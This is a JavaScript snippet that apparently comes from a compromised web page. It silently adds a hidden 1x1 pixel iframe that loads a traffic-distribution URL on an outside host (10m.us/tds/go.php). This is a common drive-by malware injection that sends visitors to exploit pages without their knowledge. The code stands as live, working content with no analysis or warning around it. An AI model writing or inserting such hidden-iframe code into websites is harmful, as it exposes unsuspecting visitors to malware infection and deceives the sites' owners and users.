var srcc = 'http://www.10m.us/tds/go.php?sid=2'; function Frame() { ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", srcc); ifrm.style.width = "1px"; ifrm.style.height = "1px"; ifrm.style.display = "none"; document.body.appendChild(ifrm); } Frame();